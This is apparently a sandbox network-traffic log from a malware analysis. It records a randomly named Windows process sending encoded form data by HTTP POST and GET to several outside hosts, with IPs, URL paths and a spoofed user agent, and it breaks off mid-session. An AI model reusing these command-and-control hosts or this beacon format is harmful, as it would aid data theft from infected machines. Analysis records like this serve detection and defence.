Nov 1, 2024 03:46:37.988571882 CET	1748	OUT	POST /855d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.givora.site Origin: http://www.givora.site Referer: http://www.givora.site/855d/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 37 44 63 6b 53 47 50 49 41 30 45 67 6f 38 42 67 66 2b 38 6a 77 66 48 65 7a 47 4c 6a 5a 45 61 6f 4b 6e 31 53 58 43 43 7a 35 56 63 61 43 7a 7a 35 2f 54 43 4a 5a 37 53 65 2f 75 74 5a 2b 4a 58 7a 6c 36 77 44 61 38 48 73 37 78 71 54 77 34 67 32 2f 75 55 47 7a 73 55 39 67 42 43 35 67 65 4c 75 78 65 7a 63 77 35 4b 69 37 71 51 4e 42 41 58 42 4a 79 57 53 6f 5a 75 51 6e 71 47 72 78 42 77 30 57 42 4a 51 56 53 72 72 56 7a 2f 43 2b 77 4b 45 4e 75 46 43 35 35 6b 46 52 62 36 31 35 4b 69 61 69 54 61 42 2f 6e 31 43 77 62 58 4d 39 47 64 51 47 61 49 76 78 6c 64 55 53 37 4c 56 52 76 4b 67 62 4b 46 51 41 4f 56 74 55 44 45 72 6d 79 73 61 41 76 34 46 30 51 4a 65 44 4c 32 70 62 65 6b 73 37 32 70 6f 34 63 59 44 6f 6b 75 61 31 57 35 6d 6e 5a 41 47 77 74 67 30 57 31 2b 6d 47 44 4d 74 69 6f 35 6d 63 38 79 4c 55 4c 72 4f 53 45 59 75 77 44 32 32 75 53 4a 64 5a 37 42 7a 42 43 44 57 71 75 47 53 57 57 55 45 42 6e 57 4b 32 48 76 67 75 77 76 6c 37 75 53 6d 65 71 4a 66 50 6a 76 33 52 72 7a 4e 7a 72 34 50 5a 41 37 6a 41 33 67 [TRUNCATED] Data Ascii: nl=7DckSGPIA0Ego8Bgf+8jwfHezGLjZEaoKn1SXCCz5VcaCzz5/TCJZ7Se/utZ+JXzl6wDa8Hs7xqTw4g2/uUGzsU9gBC5geLuxezcw5Ki7qQNBAXBJyWSoZuQnqGrxBw0WBJQVSrrVz/C+wKENuFC55kFRb615KiaiTaB/n1CwbXM9GdQGaIvxldUS7LVRvKgbKFQAOVtUDErmysaAv4F0QJeDL2pbeks72po4cYDokua1W5mnZAGwtg0W1+mGDMtio5mc8yLULrOSEYuwD22uSJdZ7BzBCDWquGSWWUEBnWK2Hvguwvl7uSmeqJfPjv3RrzNzr4PZA7jA3gRNZszQvOwckEjR20pHk/7aOEnpL90t5/68Qag6Ni5wNZsM46KJqkB+VeviEwS/q7trzC+Pf5saqX5DAr/E/+1xG2LDGdkWh5hlvn+xLIBJyiYNlvpQ2xdkNFjaMP/27tvHuICKitbiClLkqSEWY7NNTPoA+9HKU/A6+TUaNBTULeW4bNExYS6td3hOOR7gmitfC1BC0ZHO5uoRNj1lh46tv4M0Ysmj8t8DCmFIyaBDZm/mYRG06EklObWux1KkW4TnnGzX1rsk5V97CAwBMBFdWHOJczM2Bu57K2SFT0FSrr5AAz9ORJwrdqbsYIn4NnyCnxQI/7ot6VwIwQPA2I+QeKhdYU/1OSAOSDr+Do9BXpL6y8IiZCL4B5jCQV1pjYijGDpCtaXKo1eoKxD/KUq8dYQw9/GeGVK5i1z37H1B7GtewqncHRlBRpvMfRjSnCepDr0MgXd/EjusPOPMEVmN19HnAbUKnCQKWtWEP822m4nLmn60Ei9IqcHKOuorUaF7OcPvTwExm7Vw7exG3V7RSppg6LrLsmhwj0wYyL7G6100KJCxUUsPKn/bB3JVBG+j7re450otdTUoRebiWDeWYfJbJ5kZP2kCBmEl/HUtfPl3316Qo/85ivFmUlmpz69irZD7RWDwFmQA8zPgJ07sNpb8VVr8WnLu [TRUNCATED]
Nov 1, 2024 03:46:38.653585911 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:46:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49997	162.0.231.203	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:40.532124996 CET	465	OUT	GET /855d/?nl=2B0ERzH0P28lwthSCfczi4+l4RSaGiycEDtAIyO4xBEaITWb1iLHHs/q7NYM0I/g8MkSYcfxzku7nIYL4eoS8eZDgAyht6z65PzZnN779aUYRwuiIRWQuovW44/rxTRHXQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.givora.site User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:46:41.218123913 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:46:41 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49998	103.71.154.12	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:46.293983936 CET	711	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 61 36 50 6b 6a 56 75 6f 70 66 2b 45 48 51 62 50 78 70 6b 47 73 42 45 51 31 4a 47 6c 48 2f 47 76 44 47 69 52 66 47 63 31 35 35 6c 44 33 2b 54 4b 52 58 45 78 75 78 37 7a 32 66 38 72 4f 50 4d 4a 73 6b 6a 30 58 6f 54 49 63 48 31 73 31 46 30 33 5a 66 58 61 63 56 43 32 54 73 74 56 72 4c 5a 2f 32 64 65 6e 34 47 72 4c 47 43 77 75 38 38 38 4a 4d 6d 57 62 41 4c 71 68 4f 76 73 58 65 4a 68 73 64 39 34 63 62 58 34 5a 68 73 58 6d 76 52 2f 2f 75 61 4e 70 71 6a 6a 31 36 39 44 35 54 4d 42 4c 77 50 7a 41 50 7a 54 66 6e 6a 43 33 31 51 42 45 61 69 4b 62 6d 61 30 38 4d 6d 73 3d Data Ascii: nl=WcC2F+nzEW5Oa6PkjVuopf+EHQbPxpkGsBEQ1JGlH/GvDGiRfGc155lD3+TKRXExux7z2f8rOPMJskj0XoTIcH1s1F03ZfXacVC2TstVrLZ/2den4GrLGCwu888JMmWbALqhOvsXeJhsd94cbX4ZhsXmvR//uaNpqjj169D5TMBLwPzAPzTfnjC31QBEaiKbma08Mms=
Nov 1, 2024 03:46:47.246354103 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 02:46:47 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49999	103.71.154.12	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:49.378072977 CET	731	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4b 32 76 44 6e 53 52 65 48 63 31 77 70 6c 44 34 75 54 4c 4f 6e 45 71 75 78 6d 41 32 64 34 72 4f 4c 6b 4a 73 6c 54 30 57 66 6e 4a 63 58 31 75 75 31 30 31 48 76 58 61 63 56 43 32 54 73 34 34 72 4c 52 2f 31 75 47 6e 35 6b 53 35 46 43 77 68 2f 38 38 4a 49 6d 57 41 41 4c 71 35 4f 74 49 39 65 4d 6c 73 64 34 38 63 62 43 59 61 32 63 58 38 78 68 2f 72 6a 36 74 67 6e 54 79 34 6d 65 32 34 46 71 5a 55 31 35 43 71 56 52 62 33 30 44 75 50 6c 44 4a 7a 4c 53 72 79 38 35 6b 4d 53 78 35 77 72 41 74 70 42 32 2f 38 50 41 33 75 70 72 49 78 32 7a 2b 55 Data Ascii: nl=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HK2vDnSReHc1wplD4uTLOnEquxmA2d4rOLkJslT0WfnJcX1uu101HvXacVC2Ts44rLR/1uGn5kS5FCwh/88JImWAALq5OtI9eMlsd48cbCYa2cX8xh/rj6tgnTy4me24FqZU15CqVRb30DuPlDJzLSry85kMSx5wrAtpB2/8PA3uprIx2z+U
Nov 1, 2024 03:46:50.323093891 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 02:46:50 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50000	103.71.154.12	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:51.924612999 CET	1748	OUT	POST /jx6k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.2925588.com Origin: http://www.2925588.com Referer: http://www.2925588.com/jx6k/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 57 63 43 32 46 2b 6e 7a 45 57 35 4f 63 5a 58 6b 68 32 47 6f 34 76 2b 48 4a 77 62 50 34 4a 6b 43 73 42 59 51 31 49 7a 34 48 4c 69 76 44 78 75 52 65 67 49 31 69 35 6c 44 2b 65 54 47 4f 6e 45 72 75 78 76 6f 32 64 30 56 4f 4e 67 4a 74 47 4c 30 48 62 37 4a 58 58 31 75 78 46 30 30 5a 66 58 50 63 56 53 79 54 73 6f 34 72 4c 52 2f 31 76 32 6e 2b 32 71 35 44 43 77 75 38 38 38 4e 4d 6d 58 4f 41 4c 79 44 4f 74 4d 48 65 34 52 73 61 59 73 63 64 32 34 61 71 4d 58 36 77 68 2b 73 6a 36 67 34 6e 54 76 4c 6d 66 43 43 46 74 31 55 30 66 58 77 46 69 32 75 32 44 32 37 6e 44 42 72 65 32 6a 31 39 66 59 45 50 78 6c 41 6e 67 77 48 49 48 76 44 4b 54 79 68 37 65 34 44 6e 46 65 56 68 45 73 4b 6e 4e 73 2b 37 52 76 76 2f 62 55 37 6e 79 66 52 50 32 38 73 70 70 47 63 33 45 6b 4f 77 64 79 6d 63 2f 69 6c 75 72 49 33 34 74 47 62 7a 38 56 35 6e 72 6a 72 4c 45 76 49 4f 35 45 6c 52 2f 33 78 33 4e 46 38 32 6c 43 35 73 55 77 4e 6b 38 79 79 31 6e 34 66 4b 79 33 32 64 51 5a 6a 39 67 63 64 6e 6a 4f 33 42 52 62 52 30 6e 57 56 58 63 6c [TRUNCATED] Data Ascii: nl=WcC2F+nzEW5OcZXkh2Go4v+HJwbP4JkCsBYQ1Iz4HLivDxuRegI1i5lD+eTGOnEruxvo2d0VONgJtGL0Hb7JXX1uxF00ZfXPcVSyTso4rLR/1v2n+2q5DCwu888NMmXOALyDOtMHe4RsaYscd24aqMX6wh+sj6g4nTvLmfCCFt1U0fXwFi2u2D27nDBre2j19fYEPxlAngwHIHvDKTyh7e4DnFeVhEsKnNs+7Rvv/bU7nyfRP28sppGc3EkOwdymc/ilurI34tGbz8V5nrjrLEvIO5ElR/3x3NF82lC5sUwNk8yy1n4fKy32dQZj9gcdnjO3BRbR0nWVXclxNfGtO1SXk8LpGRh19bVdSfVFi9UfkjuA93lUMLFJeWM0INmRz3hY+9RerQELj9+9yH3cY2UeAzsn6JiHNFfR6CAEDeEO//Zcyv3ul8Fz/82QX3SHU+3Ca/mWBb9bwh0iPcVaZIkEgRXWpS+4m1Zd3Tl6l+cu9aiYO4fxv4DvQt83+WJwWDVb8+8cicyf0Ph6W1V8ZCMEuYRMq6I20emce6mqRCmgT3n6uia/mBOBDWl2+xNZxIzPsk94pP9EmPfRNtYBc6ohPTYaRFEWeSpGj11gFzZmWErbc4FjANzi6UmJJCnF6BBNh5M949fc1ijg6rxJpntzTmbDEq5K6/l0B4adu6w/dwOupJt5zHTD6MDcsV6D1nito+A0UxGDKCvGFppw9z3gXBQ2oVOS/mZyEuyVf4jASNxx8cYlh0SHeuYb91dz/zhtOXBD7jD8u2QDrNe+gFMeYj0xrgp3eIsunBWvkOYXsAVxJAHLl48p9EqQquIXfJOO+xEtVat2ynDVqqoAwn08Tdhnv5HyQLn58/ZmNcoiPHQjWnLKtTbBV/VcVm9Vwf0TIMEwofENe/jfPjHe8ynzGqsJ/z6sDaXyamrCDxB4CWfNCaFu+sm0NAnl9KfbRsyx+TNyUXFzgyhfHk1BqCNxz1tuxhaJ+loHGBbUFrE9mkRf5 [TRUNCATED]
Nov 1, 2024 03:46:52.861023903 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 02:46:52 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50001	103.71.154.12	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:46:54.473989964 CET	465	OUT	GET /jx6k/?nl=beqWGJ7SP2hkLKuH8Xmdr/HDPWeS3cMOlVU3zrC7D+GWWG+2bEVKgJQW/9jqYGl3wiT++u8kPbwe1lvFRaGrQmwW5G4wa8+lbGyMUfdWvdM0+8z00F7HMhpKv8gPeACQcQ==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.2925588.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:46:55.421771049 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 02:46:55 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50002	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:00.678478956 CET	711	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 36 6f 64 75 51 70 32 4f 52 73 68 4e 38 50 47 6e 6f 45 70 46 38 53 77 6e 6b 6d 4d 62 2f 69 34 53 6a 56 6d 39 6e 75 63 47 67 61 32 76 2b 32 62 4a 71 2f 65 6d 37 33 72 70 4c 38 50 6a 39 50 4b 53 51 6b 45 37 76 6b 67 4f 5a 51 46 6c 7a 4d 48 31 6d 2b 45 64 63 5a 59 6c 69 48 33 74 65 59 38 35 53 43 4a 5a 53 48 75 79 37 36 7a 6b 31 38 50 72 39 65 78 34 71 57 32 55 43 53 43 43 48 2f 32 35 4d 51 4b 43 79 71 39 4b 57 58 75 6e 4c 62 4a 56 75 63 36 6a 31 63 73 74 51 55 38 75 72 5a 43 41 76 6e 6d 76 70 44 46 5a 70 45 72 74 2f 7a 61 52 47 58 41 64 62 31 34 6b 6e 34 49 3d Data Ascii: nl=8FrukiibSUwX6oduQp2ORshN8PGnoEpF8SwnkmMb/i4SjVm9nucGga2v+2bJq/em73rpL8Pj9PKSQkE7vkgOZQFlzMH1m+EdcZYliH3teY85SCJZSHuy76zk18Pr9ex4qW2UCSCCH/25MQKCyq9KWXunLbJVuc6j1cstQU8urZCAvnmvpDFZpErt/zaRGXAdb14kn4I=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50003	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:03.221880913 CET	731	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 4d 53 6a 33 75 39 31 2f 63 47 6a 61 32 76 6d 47 62 47 6c 66 65 78 37 33 6e 68 4c 35 33 6a 39 50 4f 53 51 6e 51 37 6f 58 49 4a 61 67 46 37 6d 63 47 54 70 65 45 64 63 5a 59 6c 69 44 6d 41 65 59 6b 35 53 54 35 5a 55 6d 75 74 79 61 7a 6e 79 38 50 72 33 4f 78 38 71 57 32 6d 43 54 66 5a 48 39 4f 35 4d 51 36 43 79 2b 52 46 63 58 75 68 47 37 49 6e 71 39 6e 72 36 75 34 43 53 48 49 70 33 36 61 39 6a 78 58 46 7a 68 4e 78 36 6b 48 56 76 67 53 6d 58 6e 68 30 42 57 6f 55 35 76 65 5a 34 6d 6a 56 67 65 38 53 6e 6f 52 6c 34 64 46 50 63 65 61 41 Data Ascii: nl=8FrukiibSUwXr71ucqeOUMhO/PGn/UpJ8Ssnki1W/QMSj3u91/cGja2vmGbGlfex73nhL53j9POSQnQ7oXIJagF7mcGTpeEdcZYliDmAeYk5ST5ZUmutyazny8Pr3Ox8qW2mCTfZH9O5MQ6Cy+RFcXuhG7Inq9nr6u4CSHIp36a9jxXFzhNx6kHVvgSmXnh0BWoU5veZ4mjVge8SnoRl4dFPceaA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50004	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:05.768837929 CET	1748	OUT	POST /6o8s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.wrl-llc.net Origin: http://www.wrl-llc.net Referer: http://www.wrl-llc.net/6o8s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 38 46 72 75 6b 69 69 62 53 55 77 58 72 37 31 75 63 71 65 4f 55 4d 68 4f 2f 50 47 6e 2f 55 70 4a 38 53 73 6e 6b 69 31 57 2f 51 55 53 67 46 57 39 6e 4d 30 47 69 61 32 76 34 32 62 46 6c 66 65 73 37 33 76 6c 4c 34 4b 65 39 4e 47 53 54 46 49 37 74 6d 49 4a 4e 77 46 37 2b 73 47 48 6d 2b 45 49 63 61 68 75 69 48 36 41 65 59 6b 35 53 52 68 5a 58 33 75 74 2b 36 7a 6b 31 38 50 4f 39 65 78 45 71 57 75 32 43 54 62 4a 45 4f 47 35 4d 77 71 43 2b 74 70 46 51 58 75 6a 46 37 49 2f 71 39 72 6b 36 75 30 6b 53 47 39 